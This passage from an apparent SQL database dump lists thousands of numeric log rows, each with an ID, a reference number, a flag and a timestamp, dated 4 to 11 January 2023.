07:49:58'),(67330,1586,1,'2023-01-04','2023-01-04 08:06:32'),(67331,1586,1,'2023-01-04','2023-01-04 08:06:33'),(67332,87,1,'2023-01-04','2023-01-04 08:08:37'),(67333,87,1,'2023-01-04','2023-01-04 08:33:04'),(67334,1598,1,'2023-01-04','2023-01-04 09:31:33'),(67335,1586,1,'2023-01-04','2023-01-04 10:31:28'),(67336,1586,1,'2023-01-04','2023-01-04 10:31:30'),(67337,1586,1,'2023-01-04','2023-01-04 10:31:38'),(67338,3531,1,'2023-01-04','2023-01-04 11:16:36'),(67339,4785,1,'2023-01-04','2023-01-04 11:26:50'),(67340,4756,1,'2023-01-04','2023-01-04 11:56:48'),(67341,4440,1,'2023-01-04','2023-01-04 12:40:57'),(67342,4741,1,'2023-01-04','2023-01-04 13:26:47'),(67343,4741,1,'2023-01-04','2023-01-04 13:28:07'),(67344,4744,1,'2023-01-04','2023-01-04 13:52:18'),(67345,4966,1,'2023-01-04','2023-01-04 13:56:41'),(67346,570,1,'2023-01-04','2023-01-04 14:08:16'),(67347,3282,1,'2023-01-04','2023-01-04 14:15:57'),(67348,4762,1,'2023-01-04','2023-01-04 14:17:33'),(67349,5122,1,'2023-01-04','2023-01-04 14:29:10'),(67350,4744,1,'2023-01-04','2023-01-04 14:34:59'),(67351,4765,1,'2023-01-04','2023-01-04 14:42:55'),(67352,570,1,'2023-01-04','2023-01-04 14:43:19'),(67353,4866,1,'2023-01-04','2023-01-04 14:54:59'),(67354,4416,1,'2023-01-04','2023-01-04 14:55:02'),(67355,3674,1,'2023-01-04','2023-01-04 14:55:07'),(67356,4756,1,'2023-01-04','2023-01-04 14:55:10'),(67357,4944,1,'2023-01-04','2023-01-04 14:55:27'),(67358,4762,1,'2023-01-04','2023-01-04 14:58:45'),(67359,570,1,'2023-01-04','2023-01-04 14:59:57'),(67360,1582,1,'2023-01-04','2023-01-04 15:00:56'),(67361,80,1,'2023-01-04','2023-01-04 15:05:29'),(67362,4771,1,'2023-01-04','2023-01-04 15:07:57'),(67363,4756,1,'2023-01-04','2023-01-04 15:13:02'),(67364,4944,1,'2023-01-04','2023-01-04 15:19:22'),(67365,80,1,'2023-01-04','2023-01-04 15:19:57'),(67366,4744,1,'2023-01-04','2023-01-04 15:23:14'),(67367,4944,1,'2023-01-04','2023-01-04 15:29:45'),(67368,5042,1,'2023-01-04','2023-01-04 15:40:07'),(67369,4960,1,'2023-01-04','2023-01-04 15:45:42'),(67370,1596,1,'2023-01-04','2023-01-04 15:52:41'),(67371,1596,1,'2023-01-04','2023-01-04 16:01:17'),(67372,4765,1,'2023-01-04','2023-01-04 16:20:53'),(67373,4785,1,'2023-01-04','2023-01-04 16:30:50'),(67374,4960,1,'2023-01-04','2023-01-04 16:30:59'),(67375,4771,1,'2023-01-04','2023-01-04 16:32:35'),(67376,2617,1,'2023-01-04','2023-01-04 16:47:45'),(67377,4323,1,'2023-01-04','2023-01-04 16:49:53'),(67378,72,1,'2023-01-04','2023-01-04 16:57:43'),(67379,1695,1,'2023-01-04','2023-01-04 18:27:43'),(67380,486,1,'2023-01-04','2023-01-04 19:13:24'),(67381,4485,1,'2023-01-04','2023-01-04 19:43:53'),(67382,91,1,'2023-01-04','2023-01-04 20:00:07'),(67383,4960,1,'2023-01-04','2023-01-04 20:21:47'),(67384,4960,1,'2023-01-04','2023-01-04 20:32:27'),(67385,1586,1,'2023-01-04','2023-01-04 20:36:26'),(67386,1586,1,'2023-01-04','2023-01-04 20:36:47'),(67387,2410,1,'2023-01-04','2023-01-04 20:49:56'),(67388,1586,1,'2023-01-04','2023-01-04 20:55:53'),(67389,1718,1,'2023-01-04','2023-01-04 21:50:37'),(67390,335,1,'2023-01-04','2023-01-04 22:07:55'),(67391,5058,1,'2023-01-04','2023-01-04 22:10:23'),(67392,468,1,'2023-01-04','2023-01-04 23:38:06'),(67393,1582,1,'2023-01-05','2023-01-05 00:04:08'),(67394,4966,1,'2023-01-05','2023-01-05 00:18:51'),(67395,5054,1,'2023-01-05','2023-01-05 01:03:48'),(67396,487,1,'2023-01-05','2023-01-05 02:09:49'),(67397,1610,1,'2023-01-05','2023-01-05 02:29:07'),(67398,72,1,'2023-01-05','2023-01-05 02:54:50'),(67399,486,1,'2023-01-05','2023-01-05 03:13:30'),(67400,2152,1,'2023-01-05','2023-01-05 03:14:04'),(67401,2813,1,'2023-01-05','2023-01-05 03:45:50'),(67402,68,1,'2023-01-05','2023-01-05 03:45:56'),(67403,4827,1,'2023-01-05','2023-01-05 04:24:59'),(67404,4827,1,'2023-01-05','2023-01-05 04:42:48'),(67405,4457,1,'2023-01-05','2023-01-05 04:52:20'),(67406,4323,1,'2023-01-05','2023-01-05 05:04:03'),(67407,1602,1,'2023-01-05','2023-01-05 05:41:06'),(67408,1608,1,'2023-01-05','2023-01-05 06:43:05'),(67409,2457,1,'2023-01-05','2023-01-05 07:32:47'),(67410,2296,1,'2023-01-05','2023-01-05 08:32:27'),(67411,470,1,'2023-01-05','2023-01-05 08:37:51'),(67412,4944,1,'2023-01-05','2023-01-05 09:59:16'),(67413,5140,1,'2023-01-05','2023-01-05 09:59:54'),(67414,4765,1,'2023-01-05','2023-01-05 10:26:39'),(67415,4436,1,'2023-01-05','2023-01-05 10:51:59'),(67416,4323,1,'2023-01-05','2023-01-05 11:10:02'),(67417,4323,1,'2023-01-05','2023-01-05 11:46:01'),(67418,5163,1,'2023-01-05','2023-01-05 12:59:31'),(67419,5058,1,'2023-01-05','2023-01-05 15:01:10'),(67420,3531,1,'2023-01-05','2023-01-05 15:04:04'),(67421,68,1,'2023-01-05','2023-01-05 15:06:59'),(67422,487,1,'2023-01-05','2023-01-05 15:07:00'),(67423,89,1,'2023-01-05','2023-01-05 15:31:49'),(67424,72,1,'2023-01-05','2023-01-05 15:51:59'),(67425,3072,1,'2023-01-05','2023-01-05 15:52:11'),(67426,4944,1,'2023-01-05','2023-01-05 15:54:21'),(67427,4911,1,'2023-01-05','2023-01-05 16:06:09'),(67428,5140,1,'2023-01-05','2023-01-05 16:09:55'),(67429,1586,1,'2023-01-05','2023-01-05 16:23:45'),(67430,87,1,'2023-01-05','2023-01-05 16:37:05'),(67431,1695,1,'2023-01-05','2023-01-05 17:21:55'),(67432,4827,1,'2023-01-05','2023-01-05 18:06:58'),(67433,3781,1,'2023-01-05','2023-01-05 18:36:50'),(67434,3226,1,'2023-01-05','2023-01-05 18:41:34'),(67435,1544,1,'2023-01-05','2023-01-05 19:14:39'),(67436,472,1,'2023-01-05','2023-01-05 19:27:37'),(67437,4524,1,'2023-01-05','2023-01-05 19:42:55'),(67438,1745,1,'2023-01-05','2023-01-05 19:56:54'),(67439,4944,1,'2023-01-05','2023-01-05 20:12:40'),(67440,4363,1,'2023-01-05','2023-01-05 20:25:29'),(67441,76,1,'2023-01-05','2023-01-05 20:55:50'),(67442,68,1,'2023-01-05','2023-01-05 21:23:56'),(67443,474,1,'2023-01-05','2023-01-05 21:40:02'),(67444,87,1,'2023-01-05','2023-01-05 21:40:42'),(67445,4930,1,'2023-01-05','2023-01-05 21:42:15'),(67446,4966,1,'2023-01-05','2023-01-05 21:42:23'),(67447,2297,1,'2023-01-05','2023-01-05 22:00:03'),(67448,4938,1,'2023-01-05','2023-01-05 22:00:12'),(67449,4335,1,'2023-01-05','2023-01-05 22:04:00'),(67450,68,1,'2023-01-05','2023-01-05 22:09:05'),(67451,1600,1,'2023-01-05','2023-01-05 22:15:18'),(67452,1586,1,'2023-01-05','2023-01-05 22:16:18'),(67453,1612,1,'2023-01-05','2023-01-05 22:21:43'),(67454,4498,1,'2023-01-05','2023-01-05 22:49:58'),(67455,4866,1,'2023-01-05','2023-01-05 23:30:05'),(67456,87,1,'2023-01-05','2023-01-05 23:45:32'),(67457,3781,1,'2023-01-06','2023-01-06 00:23:26'),(67458,4420,1,'2023-01-06','2023-01-06 00:35:26'),(67459,2297,1,'2023-01-06','2023-01-06 00:38:21'),(67460,80,1,'2023-01-06','2023-01-06 01:13:01'),(67461,2297,1,'2023-01-06','2023-01-06 01:28:07'),(67462,2297,1,'2023-01-06','2023-01-06 01:33:08'),(67463,4966,1,'2023-01-06','2023-01-06 02:58:35'),(67464,91,1,'2023-01-06','2023-01-06 02:59:10'),(67465,4966,1,'2023-01-06','2023-01-06 03:01:32'),(67466,487,1,'2023-01-06','2023-01-06 03:02:01'),(67467,4966,1,'2023-01-06','2023-01-06 03:02:34'),(67468,4911,1,'2023-01-06','2023-01-06 03:10:07'),(67469,72,1,'2023-01-06','2023-01-06 03:46:01'),(67470,68,1,'2023-01-06','2023-01-06 03:54:35'),(67471,4335,1,'2023-01-06','2023-01-06 04:28:59'),(67472,87,1,'2023-01-06','2023-01-06 04:31:19'),(67473,4556,1,'2023-01-06','2023-01-06 04:37:12'),(67474,76,1,'2023-01-06','2023-01-06 06:16:45'),(67475,4612,1,'2023-01-06','2023-01-06 06:33:05'),(67476,2309,1,'2023-01-06','2023-01-06 06:34:59'),(67477,1612,1,'2023-01-06','2023-01-06 06:52:36'),(67478,4448,1,'2023-01-06','2023-01-06 07:35:41'),(67479,87,1,'2023-01-06','2023-01-06 07:40:19'),(67480,1612,1,'2023-01-06','2023-01-06 08:09:30'),(67481,486,1,'2023-01-06','2023-01-06 08:22:13'),(67482,3072,1,'2023-01-06','2023-01-06 08:52:31'),(67483,4542,1,'2023-01-06','2023-01-06 08:54:24'),(67484,481,1,'2023-01-06','2023-01-06 09:02:45'),(67485,4827,1,'2023-01-06','2023-01-06 09:07:12'),(67486,1596,1,'2023-01-06','2023-01-06 09:13:22'),(67487,4944,1,'2023-01-06','2023-01-06 09:36:16'),(67488,3257,1,'2023-01-06','2023-01-06 09:53:48'),(67489,1728,1,'2023-01-06','2023-01-06 10:11:34'),(67490,1602,1,'2023-01-06','2023-01-06 10:30:00'),(67491,3102,1,'2023-01-06','2023-01-06 10:45:15'),(67492,1732,1,'2023-01-06','2023-01-06 10:49:46'),(67493,4520,1,'2023-01-06','2023-01-06 11:45:29'),(67494,4762,1,'2023-01-06','2023-01-06 12:01:12'),(67495,4996,1,'2023-01-06','2023-01-06 12:08:19'),(67496,4582,1,'2023-01-06','2023-01-06 12:42:50'),(67497,472,1,'2023-01-06','2023-01-06 12:59:22'),(67498,1872,1,'2023-01-06','2023-01-06 13:27:53'),(67499,4944,1,'2023-01-06','2023-01-06 13:28:42'),(67500,1728,1,'2023-01-06','2023-01-06 14:01:49'),(67501,1608,1,'2023-01-06','2023-01-06 14:40:03'),(67502,68,1,'2023-01-06','2023-01-06 14:41:44'),(67503,1608,1,'2023-01-06','2023-01-06 14:41:50'),(67504,3691,1,'2023-01-06','2023-01-06 15:00:42'),(67505,4768,1,'2023-01-06','2023-01-06 16:57:01'),(67506,1608,1,'2023-01-06','2023-01-06 17:05:37'),(67507,4866,1,'2023-01-06','2023-01-06 17:16:12'),(67508,1594,1,'2023-01-06','2023-01-06 17:46:15'),(67509,2420,1,'2023-01-06','2023-01-06 17:54:59'),(67510,2154,1,'2023-01-06','2023-01-06 18:00:59'),(67511,1608,1,'2023-01-06','2023-01-06 18:10:22'),(67512,3263,1,'2023-01-06','2023-01-06 18:18:40'),(67513,3482,1,'2023-01-06','2023-01-06 18:24:26'),(67514,1594,1,'2023-01-06','2023-01-06 18:36:11'),(67515,4485,1,'2023-01-06','2023-01-06 18:51:52'),(67516,4911,1,'2023-01-06','2023-01-06 19:01:31'),(67517,3102,1,'2023-01-06','2023-01-06 19:14:47'),(67518,3694,1,'2023-01-06','2023-01-06 19:20:39'),(67519,5140,1,'2023-01-06','2023-01-06 19:26:03'),(67520,72,1,'2023-01-06','2023-01-06 19:41:57'),(67521,4582,1,'2023-01-06','2023-01-06 19:57:05'),(67522,4485,1,'2023-01-06','2023-01-06 20:31:33'),(67523,2904,1,'2023-01-06','2023-01-06 22:19:50'),(67524,484,1,'2023-01-06','2023-01-06 23:24:13'),(67525,477,1,'2023-01-06','2023-01-06 23:43:22'),(67526,4768,1,'2023-01-07','2023-01-07 00:48:40'),(67527,468,1,'2023-01-07','2023-01-07 01:54:42'),(67528,5163,1,'2023-01-07','2023-01-07 03:13:59'),(67529,4938,1,'2023-01-07','2023-01-07 03:24:17'),(67530,2911,1,'2023-01-07','2023-01-07 03:28:41'),(67531,1602,1,'2023-01-07','2023-01-07 03:59:30'),(67532,4960,1,'2023-01-07','2023-01-07 04:48:21'),(67533,1701,1,'2023-01-07','2023-01-07 04:57:03'),(67534,1722,1,'2023-01-07','2023-01-07 05:15:44'),(67535,486,1,'2023-01-07','2023-01-07 05:46:08'),(67536,2178,1,'2023-01-07','2023-01-07 06:15:28'),(67537,80,1,'2023-01-07','2023-01-07 06:22:58'),(67538,1614,1,'2023-01-07','2023-01-07 06:56:29'),(67539,1594,1,'2023-01-07','2023-01-07 07:43:30'),(67540,4960,1,'2023-01-07','2023-01-07 07:53:34'),(67541,4960,1,'2023-01-07','2023-01-07 07:54:04'),(67542,1608,1,'2023-01-07','2023-01-07 10:57:00'),(67543,1594,1,'2023-01-07','2023-01-07 10:58:06'),(67544,1602,1,'2023-01-07','2023-01-07 11:47:26'),(67545,4582,1,'2023-01-07','2023-01-07 12:19:37'),(67546,4412,1,'2023-01-07','2023-01-07 12:51:54'),(67547,4950,1,'2023-01-07','2023-01-07 13:52:28'),(67548,1582,1,'2023-01-07','2023-01-07 14:06:04'),(67549,2904,1,'2023-01-07','2023-01-07 14:10:13'),(67550,1582,1,'2023-01-07','2023-01-07 14:10:47'),(67551,1582,1,'2023-01-07','2023-01-07 14:15:35'),(67552,5131,1,'2023-01-07','2023-01-07 14:48:51'),(67553,5131,1,'2023-01-07','2023-01-07 14:50:25'),(67554,5131,1,'2023-01-07','2023-01-07 14:51:06'),(67555,3479,1,'2023-01-07','2023-01-07 14:53:16'),(67556,1586,1,'2023-01-07','2023-01-07 16:10:39'),(67557,4637,1,'2023-01-07','2023-01-07 16:29:59'),(67558,1586,1,'2023-01-07','2023-01-07 16:39:54'),(67559,2911,1,'2023-01-07','2023-01-07 17:39:55'),(67560,4457,1,'2023-01-07','2023-01-07 18:40:40'),(67561,473,1,'2023-01-07','2023-01-07 19:01:03'),(67562,473,1,'2023-01-07','2023-01-07 19:01:57'),(67563,473,1,'2023-01-07','2023-01-07 19:02:29'),(67564,5140,1,'2023-01-07','2023-01-07 19:42:13'),(67565,2154,1,'2023-01-07','2023-01-07 19:55:16'),(67566,4341,1,'2023-01-07','2023-01-07 20:05:26'),(67567,2252,1,'2023-01-07','2023-01-07 21:02:09'),(67568,5024,1,'2023-01-07','2023-01-07 21:26:36'),(67569,1586,1,'2023-01-07','2023-01-07 21:54:02'),(67570,1586,1,'2023-01-07','2023-01-07 21:54:40'),(67571,3724,1,'2023-01-07','2023-01-07 23:40:15'),(67572,1544,1,'2023-01-07','2023-01-07 23:49:26'),(67573,1586,1,'2023-01-08','2023-01-08 00:19:15'),(67574,1586,1,'2023-01-08','2023-01-08 00:19:17'),(67575,3764,1,'2023-01-08','2023-01-08 00:55:05'),(67576,3721,1,'2023-01-08','2023-01-08 01:06:58'),(67577,1600,1,'2023-01-08','2023-01-08 01:15:05'),(67578,4412,1,'2023-01-08','2023-01-08 03:37:53'),(67579,4654,1,'2023-01-08','2023-01-08 04:59:55'),(67580,1606,1,'2023-01-08','2023-01-08 05:29:54'),(67581,106,1,'2023-01-08','2023-01-08 05:37:37'),(67582,1592,1,'2023-01-08','2023-01-08 05:56:31'),(67583,1747,1,'2023-01-08','2023-01-08 05:58:10'),(67584,4657,1,'2023-01-08','2023-01-08 09:43:29'),(67585,72,1,'2023-01-08','2023-01-08 09:43:56'),(67586,2558,1,'2023-01-08','2023-01-08 10:08:51'),(67587,4938,1,'2023-01-08','2023-01-08 12:24:56'),(67588,3083,1,'2023-01-08','2023-01-08 13:36:04'),(67589,4391,1,'2023-01-08','2023-01-08 13:49:43'),(67590,4660,1,'2023-01-08','2023-01-08 13:57:40'),(67591,2159,1,'2023-01-08','2023-01-08 14:43:38'),(67592,4663,1,'2023-01-08','2023-01-08 14:46:11'),(67593,3691,1,'2023-01-08','2023-01-08 14:49:37'),(67594,2395,1,'2023-01-08','2023-01-08 15:14:19'),(67595,4357,1,'2023-01-08','2023-01-08 15:19:17'),(67596,1600,1,'2023-01-08','2023-01-08 15:42:30'),(67597,4651,1,'2023-01-08','2023-01-08 18:14:50'),(67598,4960,1,'2023-01-08','2023-01-08 18:33:13'),(67599,4960,1,'2023-01-08','2023-01-08 18:33:15'),(67600,4960,1,'2023-01-08','2023-01-08 18:33:24'),(67601,4960,1,'2023-01-08','2023-01-08 18:40:11'),(67602,4938,1,'2023-01-08','2023-01-08 18:43:31'),(67603,4645,1,'2023-01-08','2023-01-08 18:59:49'),(67604,5037,1,'2023-01-08','2023-01-08 19:03:47'),(67605,5153,1,'2023-01-08','2023-01-08 19:10:55'),(67606,4938,1,'2023-01-08','2023-01-08 19:28:39'),(67607,76,1,'2023-01-08','2023-01-08 19:35:07'),(67608,91,1,'2023-01-08','2023-01-08 19:35:38'),(67609,4897,1,'2023-01-08','2023-01-08 19:37:01'),(67610,4870,1,'2023-01-08','2023-01-08 19:37:58'),(67611,4797,1,'2023-01-08','2023-01-08 19:38:16'),(67612,4448,1,'2023-01-08','2023-01-08 19:38:32'),(67613,4542,1,'2023-01-08','2023-01-08 19:38:42'),(67614,4657,1,'2023-01-08','2023-01-08 19:44:49'),(67615,4657,1,'2023-01-08','2023-01-08 19:44:56'),(67616,4457,1,'2023-01-08','2023-01-08 19:46:38'),(67617,4897,1,'2023-01-08','2023-01-08 19:51:36'),(67618,91,1,'2023-01-08','2023-01-08 19:52:30'),(67619,4420,1,'2023-01-08','2023-01-08 19:54:10'),(67620,2769,1,'2023-01-08','2023-01-08 19:55:55'),(67621,2769,1,'2023-01-08','2023-01-08 19:56:04'),(67622,1604,1,'2023-01-08','2023-01-08 20:06:50'),(67623,1604,1,'2023-01-08','2023-01-08 20:06:52'),(67624,4694,1,'2023-01-08','2023-01-08 20:10:01'),(67625,3083,1,'2023-01-08','2023-01-08 20:22:53'),(67626,4485,1,'2023-01-08','2023-01-08 20:36:50'),(67627,1586,1,'2023-01-08','2023-01-08 20:57:19'),(67628,4485,1,'2023-01-08','2023-01-08 21:21:51'),(67629,87,1,'2023-01-08','2023-01-08 21:37:37'),(67630,68,1,'2023-01-08','2023-01-08 21:38:05'),(67631,4722,1,'2023-01-08','2023-01-08 21:58:46'),(67632,91,1,'2023-01-08','2023-01-08 23:18:53'),(67633,4587,1,'2023-01-08','2023-01-08 23:20:35'),(67634,1711,1,'2023-01-08','2023-01-08 23:20:46'),(67635,4911,1,'2023-01-08','2023-01-08 23:46:50'),(67636,1594,1,'2023-01-09','2023-01-09 00:06:45'),(67637,1594,1,'2023-01-09','2023-01-09 00:06:48'),(67638,1594,1,'2023-01-09','2023-01-09 00:07:21'),(67639,4944,1,'2023-01-09','2023-01-09 00:10:01'),(67640,4944,1,'2023-01-09','2023-01-09 00:10:02'),(67641,4944,1,'2023-01-09','2023-01-09 00:10:36'),(67642,3706,1,'2023-01-09','2023-01-09 01:50:58'),(67643,1584,1,'2023-01-09','2023-01-09 03:18:15'),(67644,4694,1,'2023-01-09','2023-01-09 04:01:57'),(67645,4648,1,'2023-01-09','2023-01-09 05:04:34'),(67646,1586,1,'2023-01-09','2023-01-09 06:20:11'),(67647,335,1,'2023-01-09','2023-01-09 06:52:22'),(67648,108,1,'2023-01-09','2023-01-09 07:02:02'),(67649,4520,1,'2023-01-09','2023-01-09 07:20:22'),(67650,4651,1,'2023-01-09','2023-01-09 08:50:16'),(67651,4654,1,'2023-01-09','2023-01-09 09:10:43'),(67652,4654,1,'2023-01-09','2023-01-09 09:10:45'),(67653,4660,1,'2023-01-09','2023-01-09 09:25:51'),(67654,4660,1,'2023-01-09','2023-01-09 09:27:01'),(67655,1602,1,'2023-01-09','2023-01-09 09:36:29'),(67656,4648,1,'2023-01-09','2023-01-09 09:40:47'),(67657,4663,1,'2023-01-09','2023-01-09 09:55:46'),(67658,4663,1,'2023-01-09','2023-01-09 09:57:38'),(67659,1608,1,'2023-01-09','2023-01-09 10:03:01'),(67660,470,1,'2023-01-09','2023-01-09 10:03:03'),(67661,76,1,'2023-01-09','2023-01-09 10:13:30'),(67662,68,1,'2023-01-09','2023-01-09 10:46:58'),(67663,4416,1,'2023-01-09','2023-01-09 10:48:13'),(67664,4911,1,'2023-01-09','2023-01-09 10:52:35'),(67665,4966,1,'2023-01-09','2023-01-09 11:21:40'),(67666,1584,1,'2023-01-09','2023-01-09 11:31:03'),(67667,4551,1,'2023-01-09','2023-01-09 11:32:15'),(67668,80,1,'2023-01-09','2023-01-09 11:32:28'),(67669,4428,1,'2023-01-09','2023-01-09 11:32:58'),(67670,1584,1,'2023-01-09','2023-01-09 11:33:40'),(67671,80,1,'2023-01-09','2023-01-09 11:33:49'),(67672,80,1,'2023-01-09','2023-01-09 11:38:08'),(67673,80,1,'2023-01-09','2023-01-09 11:44:37'),(67674,1584,1,'2023-01-09','2023-01-09 11:44:58'),(67675,1722,1,'2023-01-09','2023-01-09 12:08:23'),(67676,5001,1,'2023-01-09','2023-01-09 12:51:19'),(67677,570,1,'2023-01-09','2023-01-09 12:55:08'),(67678,4866,1,'2023-01-09','2023-01-09 12:55:32'),(67679,2769,1,'2023-01-09','2023-01-09 13:09:53'),(67680,1722,1,'2023-01-09','2023-01-09 13:18:49'),(67681,84,1,'2023-01-09','2023-01-09 13:29:37'),(67682,1606,1,'2023-01-09','2023-01-09 14:04:39'),(67683,3781,1,'2023-01-09','2023-01-09 14:13:42'),(67684,1586,1,'2023-01-09','2023-01-09 14:50:32'),(67685,4703,1,'2023-01-09','2023-01-09 14:53:24'),(67686,4323,1,'2023-01-09','2023-01-09 14:53:36'),(67687,1606,1,'2023-01-09','2023-01-09 15:08:07'),(67688,485,1,'2023-01-09','2023-01-09 15:14:17'),(67689,4960,1,'2023-01-09','2023-01-09 15:17:01'),(67690,4776,1,'2023-01-09','2023-01-09 15:18:15'),(67691,485,1,'2023-01-09','2023-01-09 15:24:29'),(67692,87,1,'2023-01-09','2023-01-09 15:25:13'),(67693,471,1,'2023-01-09','2023-01-09 15:25:52'),(67694,3316,1,'2023-01-09','2023-01-09 15:27:31'),(67695,4944,1,'2023-01-09','2023-01-09 15:28:27'),(67696,87,1,'2023-01-09','2023-01-09 15:29:49'),(67697,479,1,'2023-01-09','2023-01-09 15:30:38'),(67698,87,1,'2023-01-09','2023-01-09 15:31:32'),(67699,484,1,'2023-01-09','2023-01-09 15:32:00'),(67700,485,1,'2023-01-09','2023-01-09 15:32:22'),(67701,486,1,'2023-01-09','2023-01-09 15:32:32'),(67702,487,1,'2023-01-09','2023-01-09 15:32:53'),(67703,87,1,'2023-01-09','2023-01-09 15:33:25'),(67704,91,1,'2023-01-09','2023-01-09 15:33:50'),(67705,5080,1,'2023-01-09','2023-01-09 15:35:15'),(67706,5067,1,'2023-01-09','2023-01-09 15:45:30'),(67707,5071,1,'2023-01-09','2023-01-09 16:15:48'),(67708,3781,1,'2023-01-09','2023-01-09 16:25:14'),(67709,3781,1,'2023-01-09','2023-01-09 16:25:44'),(67710,3781,1,'2023-01-09','2023-01-09 16:29:16'),(67711,5067,1,'2023-01-09','2023-01-09 16:30:46'),(67712,5037,1,'2023-01-09','2023-01-09 16:31:48'),(67713,4911,1,'2023-01-09','2023-01-09 16:41:50'),(67714,4911,1,'2023-01-09','2023-01-09 16:43:18'),(67715,1612,1,'2023-01-09','2023-01-09 16:54:41'),(67716,4960,1,'2023-01-09','2023-01-09 17:03:41'),(67717,4960,1,'2023-01-09','2023-01-09 17:25:08'),(67718,1594,1,'2023-01-09','2023-01-09 18:16:37'),(67719,1722,1,'2023-01-09','2023-01-09 18:34:45'),(67720,1606,1,'2023-01-09','2023-01-09 18:57:45'),(67721,1606,1,'2023-01-09','2023-01-09 18:58:36'),(67722,5157,1,'2023-01-09','2023-01-09 19:38:51'),(67723,4911,1,'2023-01-09','2023-01-09 20:25:09'),(67724,4457,1,'2023-01-09','2023-01-09 20:25:40'),(67725,2159,1,'2023-01-09','2023-01-09 20:46:12'),(67726,84,1,'2023-01-09','2023-01-09 23:19:33'),(67727,2309,1,'2023-01-09','2023-01-09 23:40:21'),(67728,87,1,'2023-01-09','2023-01-09 23:40:45'),(67729,484,1,'2023-01-09','2023-01-09 23:41:32'),(67730,2309,1,'2023-01-09','2023-01-09 23:41:42'),(67731,4703,1,'2023-01-10','2023-01-10 00:47:17'),(67732,4412,1,'2023-01-10','2023-01-10 00:53:24'),(67733,1751,1,'2023-01-10','2023-01-10 00:58:28'),(67734,1602,1,'2023-01-10','2023-01-10 01:03:21'),(67735,3109,1,'2023-01-10','2023-01-10 01:06:32'),(67736,1602,1,'2023-01-10','2023-01-10 02:37:23'),(67737,2159,1,'2023-01-10','2023-01-10 03:54:21'),(67738,4747,1,'2023-01-10','2023-01-10 04:18:18'),(67739,2410,1,'2023-01-10','2023-01-10 04:32:09'),(67740,4776,1,'2023-01-10','2023-01-10 04:44:32'),(67741,1604,1,'2023-01-10','2023-01-10 05:16:09'),(67742,1544,1,'2023-01-10','2023-01-10 05:56:42'),(67743,91,1,'2023-01-10','2023-01-10 06:03:16'),(67744,91,1,'2023-01-10','2023-01-10 06:05:03'),(67745,1768,1,'2023-01-10','2023-01-10 06:20:49'),(67746,3691,1,'2023-01-10','2023-01-10 07:11:51'),(67747,91,1,'2023-01-10','2023-01-10 07:45:41'),(67748,2161,1,'2023-01-10','2023-01-10 08:02:46'),(67749,1596,1,'2023-01-10','2023-01-10 08:06:49'),(67750,87,1,'2023-01-10','2023-01-10 08:13:21'),(67751,1711,1,'2023-01-10','2023-01-10 09:15:06'),(67752,4717,1,'2023-01-10','2023-01-10 09:21:27'),(67753,1602,1,'2023-01-10','2023-01-10 09:33:56'),(67754,74,1,'2023-01-10','2023-01-10 09:35:33'),(67755,4301,1,'2023-01-10','2023-01-10 09:38:01'),(67756,4622,1,'2023-01-10','2023-01-10 10:13:08'),(67757,2658,1,'2023-01-10','2023-01-10 10:20:22'),(67758,5071,1,'2023-01-10','2023-01-10 10:29:41'),(67759,89,1,'2023-01-10','2023-01-10 11:00:45'),(67760,2658,1,'2023-01-10','2023-01-10 11:11:21'),(67761,1751,1,'2023-01-10','2023-01-10 11:12:50'),(67762,480,1,'2023-01-10','2023-01-10 11:15:02'),(67763,3083,1,'2023-01-10','2023-01-10 11:24:44'),(67764,4420,1,'2023-01-10','2023-01-10 11:29:49'),(67765,3083,1,'2023-01-10','2023-01-10 11:35:53'),(67766,1602,1,'2023-01-10','2023-01-10 11:38:18'),(67767,3083,1,'2023-01-10','2023-01-10 11:38:35'),(67768,4944,1,'2023-01-10','2023-01-10 12:33:56'),(67769,2309,1,'2023-01-10','2023-01-10 12:42:34'),(67770,4618,1,'2023-01-10','2023-01-10 12:44:40'),(67771,4618,1,'2023-01-10','2023-01-10 12:45:10'),(67772,1602,1,'2023-01-10','2023-01-10 13:12:30'),(67773,2309,1,'2023-01-10','2023-01-10 13:57:29'),(67774,87,1,'2023-01-10','2023-01-10 14:36:14'),(67775,76,1,'2023-01-10','2023-01-10 15:24:31'),(67776,4412,1,'2023-01-10','2023-01-10 15:41:27'),(67777,87,1,'2023-01-10','2023-01-10 15:55:02'),(67778,470,1,'2023-01-10','2023-01-10 15:56:31'),(67779,470,1,'2023-01-10','2023-01-10 16:02:11'),(67780,4776,1,'2023-01-10','2023-01-10 16:20:48'),(67781,1610,1,'2023-01-10','2023-01-10 16:43:39'),(67782,4911,1,'2023-01-10','2023-01-10 17:13:49'),(67783,91,1,'2023-01-10','2023-01-10 18:03:02'),(67784,3781,1,'2023-01-10','2023-01-10 18:09:18'),(67785,2804,1,'2023-01-10','2023-01-10 18:44:42'),(67786,1612,1,'2023-01-10','2023-01-10 18:48:30'),(67787,3430,1,'2023-01-10','2023-01-10 19:06:15'),(67788,1751,1,'2023-01-10','2023-01-10 19:16:25'),(67789,1596,1,'2023-01-10','2023-01-10 19:25:21'),(67790,1596,1,'2023-01-10','2023-01-10 19:28:06'),(67791,1614,1,'2023-01-10','2023-01-10 20:17:36'),(67792,1586,1,'2023-01-10','2023-01-10 20:29:27'),(67793,1586,1,'2023-01-10','2023-01-10 20:30:17'),(67794,4635,1,'2023-01-10','2023-01-10 20:33:26'),(67795,3229,1,'2023-01-10','2023-01-10 20:41:48'),(67796,4420,1,'2023-01-10','2023-01-10 20:51:54'),(67797,4842,1,'2023-01-10','2023-01-10 21:39:56'),(67798,2154,1,'2023-01-10','2023-01-10 22:58:33'),(67799,91,1,'2023-01-10','2023-01-10 22:59:10'),(67800,5140,1,'2023-01-10','2023-01-10 22:59:44'),(67801,5140,1,'2023-01-10','2023-01-10 22:59:45'),(67802,91,1,'2023-01-10','2023-01-10 23:05:55'),(67803,5140,1,'2023-01-10','2023-01-10 23:06:32'),(67804,5140,1,'2023-01-10','2023-01-10 23:06:33'),(67805,4457,1,'2023-01-10','2023-01-10 23:20:51'),(67806,91,1,'2023-01-10','2023-01-10 23:21:15'),(67807,4960,1,'2023-01-10','2023-01-10 23:37:32'),(67808,1594,1,'2023-01-10','2023-01-10 23:48:59'),(67809,1594,1,'2023-01-10','2023-01-10 23:49:03'),(67810,74,1,'2023-01-11','2023-01-11 03:15:15'),(67811,570,1,'2023-01-11','2023-01-11 03:55:26'),(67812,4870,1,'2023-01-11','2023-01-11 04:29:47'),(67813,74,1,'2023-01-11','2023-01-11 04:45:18'),(67814,1604,1,'2023-01-11','2023-01-11 05:13:43'),(67815,471,1,'2023-01-11','2023-01-11 05:38:12'),(67816,5062,1,'2023-01-11','2023-01-11 